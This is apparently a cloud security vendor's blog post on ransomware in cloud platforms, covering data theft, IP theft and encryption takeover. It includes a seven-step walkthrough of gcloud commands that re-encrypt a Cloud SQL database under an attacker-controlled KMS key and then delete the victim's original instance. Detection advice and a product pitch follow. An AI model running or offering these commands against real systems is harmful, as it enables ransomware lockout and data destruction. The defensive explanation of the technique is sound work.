Ransomware’s Reach: Data Risks, IP Theft, and Encryption Takeover in the Cloud

In our previous article on Cloud Heists, we highlighted how attackers exploit credential theft and privilege escalation to take over cloud environments. However, ransomware poses an even broader threat, targeting cloud platforms to steal sensitive data, disrupt business operations, and hold companies hostage. In this post, we’ll explore these growing ransomware trends and offer insights on how to help protect your organization.

The Evolution of Ransomware in the Cloud Era

As cloud platforms evolve and offer increasingly more capabilities, our findings indicate that attackers aim to use these cloud services to access large volumes of sensitive data and critical applications, making these attacks especially harmful. Given the centralized nature of cloud services, a breach can affect multiple users and services at once, leading to financial losses and damaging a company’s reputation. With more businesses relying on the cloud, understanding these evolving risks is vital.

Let’s take a look at some risks associated with cloud environments, along with real-world examples that show just how damaging these vulnerabilities can be.

Data Risks in Cloud Environments

1. Data Exfiltration: Attackers can steal vast amounts of data by exploiting poorly secured APIs or use legitimate cloud storage transfer services. For instance, in 2024 Hackers accessed customer accounts from Snowflake, a cloud storage provider, by using stolen login credentials. This breach affected multiple companies leading to the exposure of sensitive data. Following the breach, attackers issued ransom demands, threatening to release the stolen information unless payments were made, putting further pressure on affected organizations.
2. Exploitation of Misconfigured Storage:  According to a survey conducted by Verizon, misconfigured cloud storage accounts for 10% of data breaches. When attackers encounter such vulnerabilities, they can expose vast amounts of sensitive records and affect millions of people. A notable example is Pegasus Airlines’ misconfigured AWS S3 bucket, which exposed sensitive passenger data of approximately 6.5 million people in 2022.
3. Data Corruption: In some cases, attackers don’t just steal data – they corrupt it, leading to prolonged downtime and costly recovery efforts.
4. Lack of Backup Protection: A poorly implemented backup policy can make recovery nearly impossible after a ransomware attack. Organizations without strong backup systems risk data loss and service interruptions.

Intellectual Property (IP) Theft

1. Source Code Repositories: Cloud-based code repositories are frequent targets for IP theft. A breach in these repositories can expose sensitive company information, enable unauthorized modifications, and risk malicious exploitation or public release. An example of that can be seen in 2024, when The New York Times experienced a significant data breach that exposed sensitive information and source code. The hackers accessed over 5,000 repositories containing internal source code using stolen GitHub credentials.

2. Design Documents and Trade Secrets: Valuable design documents and trade secrets stored in cloud systems are high-risk assets with potentially severe implications if exposed. For instance, In January 2024, Mercedes-Benz experienced a security breach that exposed the company’s intellectual property, passwords, and cloud access keys. Such breaches not only compromise proprietary information but also threaten a company’s reputation and could result in long-term impacts on innovation and market positioning.

Encryption Takeover in the Cloud

1. Abuse of Cloud Encryption APIs: Attackers can abuse encryption APIs to re-encrypt victim data, effectively locking organizations out of their own systems and blocking their access to essential information. This tactic can severely disrupt operations, delay recovery efforts, and force organizations into difficult decisions regarding data retrieval or ransom payments.
2. Key Management Weaknesses: Improper key management, such as failing to rotate encryption keys or storing them insecurely, exposes companies to encryption takeovers. These vulnerabilities can grant attackers unauthorized access to protected data, increasing the risk of data breaches and unauthorized decryption, which can disrupt services and put the company’s data integrity at risk.

Step-by-Step Attack Scenario: Cloud SQL Ransomware 

Next, we will dive into an example of how an attacker might carry out a cloud ransomware attack. In this scenario, the attacker leverages Google Cloud SQL’s replication capabilities by transferring encrypted data to a new Cloud SQL instance under their control, using a custom key ring and encryption key created within Google Cloud Key Management Service (KMS). This setup grants the attacker exclusive access to the encryption, allowing them to re-encrypt the data in a way that only they can decrypt. This tactic allows the attacker to effectively lock legitimate users out of their own data.

Step 1: Create the Cloud SQL Service Account

To use Customer-Managed Encryption Keys (CMEK) with Cloud SQL, a dedicated Cloud SQL service account is required. In some cases, this service account might not be automatically created. We start by ensuring that this service account is available, as it will handle encryption and decryption operations for instances using CMEK.

gcloud beta services identity create \
  --service=sqladmin.googleapis.com \
  --project=<PROJECT-ID>

Step 2: Create Key Rings and CMEK Keys for Victim and Attacker

 Next, we need two separate encryption keys: one for the victim’s Cloud SQL instance and one for the attacker’s replica. By creating separate key rings and CMEK keys in different regions, the attacker can re-encrypt the data with a key under their control. This setup allows the attacker to deny access to the victim’s data once it’s encrypted with the new key.

1. Create the Victim Key Ring and Key:

gcloud kms keyrings create victim-keyring --location=<VICTIM-REGION> --project=<PROJECT-ID>
gcloud kms keys create victim-cmek-key \
  --location=<VICTIM-REGION> --keyring=victim-keyring --purpose=encryption \
  --project=<PROJECT-ID>

2. Create the Attacker Key Ring and Key:

gcloud kms keyrings create attacker-keyring --location=<ATTACKER-REGION> --project=<PROJECT-ID>

gcloud kms keys create attacker-cmek-key \ --location=<ATTACKER-REGION> --keyring=attacker-keyring --purpose=encryption \ --project=<PROJECT-ID>

Step 3: Grant Permissions on the Victim and Attacker CMEK Keys

For Cloud SQL to use the CMEK keys during instance creation and replication, the Cloud SQL service account needs access to both keys. Here, we grant the Cloud SQL service account permission to encrypt and decrypt data with each CMEK key, enabling it to create and manage instances using these keys.

1. Retrieve Project Number:

gcloud projects describe <PROJECT-ID> --format="value(projectNumber)"

2. Grant Access on the Victim CMEK Key: 

gcloud kms keys add-iam-policy-binding victim-cmek-key \ 
--location=<VICTIM-REGION> \ --keyring=victim-keyring \ 
--member="serviceAccount:service-<project-number>@gcp-sa-cloud-sql.iam.gserviceaccount.com" \ --role="roles/cloudkms.cryptoKeyEncrypterDecrypter" \ 
--project=<PROJECT-ID>

3. Grant Access on the Attacker CMEK Key:

gcloud kms keys add-iam-policy-binding attacker-cmek-key \ 
--location=<ATTACKER-REGION> \ --keyring=attacker-keyring \ 
--member="serviceAccount:service-<project-number>@gcp-sa-cloud-sql.iam.gserviceaccount.com" \ --role="roles/cloudkms.cryptoKeyEncrypterDecrypter" \ 
--project=<PROJECT-ID>

Step 4: Create the Victim Cloud SQL Instance with CMEK

Now, we set up the victim’s Cloud SQL instance using the victim’s CMEK key. 

Note: Make sure that the region matches the region of the key

gcloud sql instances create victim-instance \
  --project=<PROJECT-ID> \
  --database-version=MYSQL_8_0 \
  --cpu=2 --memory=7680MB \
  --region=<VICTIM-REGION> \
  --storage-auto-increase \
  --enable-bin-log \

--disk-encryption-key=projects/<PROJECT-ID>/locations/<VICTIM-REGION>/keyRings/victim-keyring/cryptoKeys/victim-cmek-key

Step 5:  Create the Attacker’s instance (Replica of the Victim’s instance)

With the victim’s instance in place, the attacker can now create a replica of this instance in a different region. The replica will be encrypted with the attacker’s CMEK key, ensuring that the data is re-encrypted under the attacker’s control. 

Note: Make sure that the region matches the region of the key

gcloud sql instances create attacker-instance \
  --master-instance-name=victim-instance \
  --region=<ATTACKER-REGION> \
  
--disk-encryption-key=projects/<PROJECT-ID>/locations/<ATTACKER-REGION>/keyRings/attacker-keyring/cryptoKeys/attacker-cmek-key

Step 6:  Promote the Replica to Standalone

After replication is complete, the attacker promotes the replica to a standalone instance. This action breaks the link with the original (victim) instance, effectively creating an independent copy of the data encrypted with the attacker’s CMEK key. The data is now fully controlled by the attacker, denying the victim any access.

gcloud sql instances promote-replica attacker-instance

Step 7: Disable or Delete the Original Cloud SQL Instance

To complete the attack, the attacker deletes or disables the original victim-instance. By removing this instance, the attacker ensures that the only accessible version of the data is in attacker-instance, now encrypted with the attacker’s CMEK key. Alternatively, the attacker could modify access controls on victim-instance to further limit the victim’s ability to access their data.

gcloud sql instances delete victim-instance --quiet

Evading Ransomware Attacks with Runtime Protection in the Cloud

Effective runtime monitoring is crucial for detecting and responding to potential security threats in cloud environments, especially in scenarios like the one described above.

Next, we will highlight key aspects of runtime monitoring that can help organizations identify and mitigate risks at various stages of a potential breach, from initial reconnaissance to data exfiltration and manipulation.

By understanding how attackers carry out potential attacks and which security measures you can implement to stop them,, you can better prepare your cloud infrastructure against similar threats. Use the following runtime-focused tips to evade cloud ransomware:

Monitor the Listing of Public Data Resources 

• Keep an eye on any unusual API calls of sensitive services such as storage object services, managed databases, etc, especially from unfamiliar IP addresses.
• Use eBPF to track outbound DNS requests and connections to internal data services endpoints. This can help identify scanning activities.
• Track new exposed resources such as managed DBs, Cloud storage, Data platforms, etc

Identify Who Accesses Vulnerable Resources

• Enable and analyze logs for all object-level operations on your cloud storage buckets.
• Monitor for unexpected credential usage or permission changes.
• Monitor for high volumes of file read operations, which could indicate someone is exploring the bucket’s content.

Block Exfiltration of Sensitive Data

• Use eBPF for real-time network traffic analysis to monitor and block suspicious outbound data transfers, particularly large data movements to unfamiliar destinations.
• By defining a business process you could use eBPF network tracing to identify out-of-baseline communications that ransomware will perform for lateral movement in the cluster.

Monitor for Data Modification

• Monitor file system activities for any unusual write operations that could indicate data modification.

What CISOs Can Do to Protect Cloud Data Services

To effectively secure cloud environments, CISOs should adopt the following key practices:

• Strengthen Authentication: Implement multi-factor authentication (MFA) and explore passwordless options.
• Encrypt Everything: Ensure your cloud provider’s encryption protocols cover data at rest, in transit, and during processing. Also, prioritize proper key management to avoid vulnerabilities in encryption takeovers.
• Conduct Regular Audits: Frequent cloud configuration checks can prevent misconfigurations, which are responsible for over 67% of cloud breaches. Use tools like AWS CloudTrail for continuous monitoring.
• Backup and Test: A solid backup plan is critical. Features like versioning and object lock can help, especially in the event of a ransomware attack.
• Limit Access Rights: Limit access by applying the principle of least privilege to high-risk areas like databases, storage buckets, and management interfaces. Regularly review and restrict who can modify or view sensitive resources, ensuring only essential personnel have access. Automate these reviews to promptly remove unused permissions and close potential entry points.

How Upwind Protects You from These Threats

Upwind’s runtime-powered cloud security platform offers comprehensive protection through advanced threat detection, posture analysis, and API security.

Our eBPF-based sensor provides real-time insights into processes, network activities, and file system accesses across Kubernetes workloads and virtual machines, combining the sensor approach with our real-time integration with the cloud provider allows us to identify weak configurations, detect misuse of managed services, and create security baselines for normal resource behavior.

By leveraging machine learning to analyze typical patterns, Upwind proactively alerts you about suspicious activities that deviate from established baselines.

Our platform also includes features like API endpoint cataloging, vulnerability scanning, and automated threat response. Through these capabilities, Upwind helps mitigate risks before they escalate into full-scale attacks, reducing alert noise by 95% and enabling teams to identify root causes 10x faster. 

Learn More

To learn more about how Upwind protects users from cloud ransomware attacks, schedule a demo.